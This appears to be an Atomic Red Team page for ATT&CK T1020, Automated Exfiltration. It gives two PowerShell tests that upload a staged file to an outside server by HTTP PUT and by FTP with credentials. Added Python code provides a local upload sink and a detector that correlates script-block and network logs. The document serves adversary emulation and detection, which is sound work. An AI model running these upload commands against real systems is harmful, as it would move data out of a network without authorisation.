Atomic Red Team

T1020 - Automated Exfiltration

Description from ATT&CK

Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection.(Citation: ESET Gamaredon June 2020)

When automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as Exfiltration Over C2 Channel and Exfiltration Over Alternative Protocol.

Atomic Tests


Atomic Test #1 - IcedID Botnet HTTP PUT

Creates a text file, tries to upload it to a server via the HTTP PUT method with a Content-Type header, then deletes the created file.

Supported Platforms: Windows

auto_generated_guid: 9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0

Inputs:

Name      Description          Type     Default Value
file      Exfiltration File    string   C:\temp\T1020_exfilFile.txt
domain    Destination Domain   url      https://google.com

Attack Commands: Run with powershell!

# File to stage and the upload target (defaults: C:\temp\T1020_exfilFile.txt and https://google.com)
$fileName = "#{file}"
$url = "#{domain}"
# Stage a small marker file; -Force overwrites an existing file at that path
$file = New-Item -Force $fileName -Value "This is ART IcedID Botnet Exfil Test"
$contentType = "application/octet-stream"
# Upload with HTTP PUT; errors are swallowed because the default target rejects PUT and the attempt itself is what the test exercises
try {Invoke-WebRequest -Uri $url -Method Put -ContentType $contentType -InFile $fileName} catch{}

Cleanup Commands:

$fileName = "#{file}"
Remove-Item -Path $fileName -ErrorAction Ignore
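The default domain input (https://google.com) rejects PUT, so the test above only exercises the attempt. To see the request a web-proxy or server log would record, run a local sink and point the test's domain input at it. The following is an added example in Python, not Atomic Red Team code; the /exfil path, port 8080 and the 201 response are assumptions.

```python
"""Local HTTP PUT sink for observing T1020 test #1 uploads.

Added example, not part of Atomic Red Team. Run it, then set the atomic's
`domain` input to http://127.0.0.1:8080/exfil (path and port are assumptions).
"""
import threading
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Every upload the sink accepts is appended here as a dict so the operator
# (or a test) can check exactly what left the host.
RECEIVED = []


class PutSink(BaseHTTPRequestHandler):
    def do_PUT(self):
        # Invoke-WebRequest -InFile sends the file as the request body with a Content-Length.
        length = int(self.headers.get("Content-Length", 0))
        body = self.rfile.read(length)
        RECEIVED.append({
            "path": self.path,
            "content_type": self.headers.get("Content-Type"),
            "user_agent": self.headers.get("User-Agent"),
            "size": length,
            "body": body,
        })
        self.send_response(201)  # assumed response; the atomic ignores the status anyway
        self.end_headers()

    def do_GET(self):
        # The atomic only issues PUT; refuse anything else so a stray request stands out.
        self.send_error(405)

    def log_message(self, fmt, *args):
        # One line per request, in the shape a defender would see in a web-server log.
        print("%s %s %s" % (self.address_string(), self.command, self.path))


def start_sink(host="127.0.0.1", port=0):
    """Start the sink in a background thread; returns (server, base_url).
    port=0 lets the OS pick a free port, which the tests rely on."""
    server = HTTPServer((host, port), PutSink)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, "http://%s:%d" % server.server_address


def put_file_bytes(url, data, content_type="application/octet-stream"):
    """Client-side equivalent of Invoke-WebRequest -Method Put -ContentType ... -InFile;
    returns the HTTP status code."""
    req = urllib.request.Request(url, data=data, method="PUT",
                                 headers={"Content-Type": content_type})
    with urllib.request.urlopen(req) as resp:
        return resp.status


if __name__ == "__main__":
    server, base = start_sink(port=8080)
    print("PUT sink listening at %s; set the atomic's domain input to %s/exfil" % (base, base))
    try:
        threading.Event().wait()
    except KeyboardInterrupt:
        server.shutdown()
```

Because the sink records Content-Type and User-Agent, it also shows what to key a proxy rule on: the atomic sends application/octet-stream from the Invoke-WebRequest user agent, which is rare for a legitimate browser PUT.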


Atomic Test #2 - Exfiltration via Encrypted FTP

Simulates file transfer to an FTP server. For testing purposes, a free FTP testing portal is available at https://sftpcloud.io/tools/free-ftp-server, providing a temporary FTP server for 60 minutes. Use this service responsibly for testing and validation only. Note that Invoke-WebRequest does not negotiate FTPS: with an ftp:// URI, Windows PowerShell 5.1 performs a plaintext FTP transfer, and PowerShell 7 rejects the scheme outright (only http and https are supported), so despite the test name the upload is not encrypted on the wire.

Supported Platforms: Windows

auto_generated_guid: 5b380e96-b0ef-4072-8a8e-f194cb9eb9ac

Inputs:

Name          Description                              Type     Default Value
sampleFile    Path of the sample file to exfiltrate.   String   C:\temp\T1020__FTP_sample.txt
ftpServer     FTP server URL.                          Url      ftp://example.com
credentials   FTP server credentials.                  String   [user:password]

Attack Commands: Run with powershell!

# Stage a small sample file at the configured path
$sampleData = "Sample data for exfiltration test"
Set-Content -Path "#{sampleFile}" -Value $sampleData
$ftpUrl = "#{ftpServer}"
# Get-Credential treats the supplied string as the user name and prompts interactively for the password
$creds = Get-Credential -Credential "#{credentials}"
# Upload the file with the supplied credentials (plain FTP; no TLS is negotiated)
Invoke-WebRequest -Uri $ftpUrl -Method Put -InFile "#{sampleFile}" -Credential $creds

Cleanup Commands:

Remove-Item -Path "#{sampleFile}" -ErrorAction Ignore
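Both tests leave the same two-part trail on the host: a PowerShell script block that issues an upload (HTTP PUT in test #1, an ftp:// URI in test #2) followed within seconds by an outbound connection from that PowerShell process. The following added example, in Python and not Atomic Red Team code, correlates the two over constructed records shaped like PowerShell event 4104 (script block logging) and Sysmon event 3 (network connection); the field names, process IDs, timestamps and destination addresses are all made up for the example.

```python
"""Correlate PowerShell script-block logs with Sysmon network events to flag
the uploads T1020 tests #1 and #2 generate.

Added example, not Atomic Red Team code. The records below are constructed to
resemble PowerShell EID 4104 and Sysmon EID 3 events; the field names are an
assumption, not a vendor schema.
"""
import ipaddress
import re
from datetime import datetime, timedelta

# The upload shapes the two atomics produce (case-insensitive, across line breaks).
UPLOAD_CMD = re.compile(r"Invoke-WebRequest\b.*?-Method\s+Put\b", re.I | re.S)
FTP_URI = re.compile(r"\bftp://", re.I)
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}
UPLOAD_PORTS = {21, 80, 443}  # ftp, http, https

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed EID 4104 script-block records (pid = the process that logged the block).
SCRIPT_BLOCKS = [
    {"time": "2024-05-01T10:00:00", "pid": 4321,
     "text": '$url = "https://google.com"\nInvoke-WebRequest -Uri $url -Method Put '
             '-ContentType "application/octet-stream" -InFile C:\\temp\\T1020_exfilFile.txt'},
    {"time": "2024-05-01T10:05:00", "pid": 4400,
     "text": "Invoke-WebRequest -Uri ftp://example.com -Method Put "
             "-InFile C:\\temp\\T1020__FTP_sample.txt -Credential $creds"},
    {"time": "2024-05-01T10:10:00", "pid": 5000,
     "text": "Invoke-WebRequest -Uri https://intranet.example/health"},  # benign GET
]

# Constructed Sysmon EID 3 network-connection records.
NET_EVENTS = [
    {"time": "2024-05-01T10:00:01", "pid": 4321, "image": PS, "dst_ip": "142.250.80.46", "dst_port": 443},
    {"time": "2024-05-01T10:05:02", "pid": 4400, "image": PS, "dst_ip": "93.184.216.34", "dst_port": 21},
    {"time": "2024-05-01T10:10:01", "pid": 5000, "image": PS, "dst_ip": "10.0.0.5", "dst_port": 443},
    {"time": "2024-05-01T10:00:01", "pid": 6000,
     "image": r"C:\Program Files\Mozilla Firefox\firefox.exe", "dst_ip": "142.250.80.46", "dst_port": 443},
]


def is_upload_command(text):
    """True if the script block has the PUT form of test #1 or the ftp:// form of test #2."""
    return bool(UPLOAD_CMD.search(text) or FTP_URI.search(text))


def find_exfil_candidates(script_blocks, net_events, window_seconds=30, ignore_private=True):
    """Return one hit per (upload script block, matching PowerShell connection) pair.

    A connection matches when it comes from the same pid, the image is PowerShell,
    the port is one the two tests use, and it occurs within window_seconds after
    the script block. ignore_private drops RFC 1918 destinations as a tuning knob;
    set it False if internal staging servers are in scope."""
    window = timedelta(seconds=window_seconds)
    hits = []
    for sb in script_blocks:
        if not is_upload_command(sb["text"]):
            continue
        t0 = datetime.fromisoformat(sb["time"])
        for ev in net_events:
            image = ev["image"].rsplit("\\", 1)[-1].lower()
            if ev["pid"] != sb["pid"] or image not in POWERSHELL_IMAGES:
                continue
            if ev["dst_port"] not in UPLOAD_PORTS:
                continue
            if ignore_private and ipaddress.ip_address(ev["dst_ip"]).is_private:
                continue
            delta = datetime.fromisoformat(ev["time"]) - t0
            if timedelta(0) <= delta <= window:
                hits.append({
                    "pid": sb["pid"],
                    "dst": "%s:%d" % (ev["dst_ip"], ev["dst_port"]),
                    "channel": "ftp" if ev["dst_port"] == 21 else "http",
                    "command": sb["text"].splitlines()[-1],
                })
    return hits


if __name__ == "__main__":
    for hit in find_exfil_candidates(SCRIPT_BLOCKS, NET_EVENTS):
        print("T1020 candidate: pid=%(pid)d %(channel)s -> %(dst)s | %(command)s" % hit)
```

The script-block match alone is noisy (administrators do upload with Invoke-WebRequest) and the network event alone is noisier still; requiring both from the same process inside a short window is what makes the rule usable. After running either atomic, the expected outcome is exactly one hit for that test's PowerShell process and none for the browser or the intranet GET.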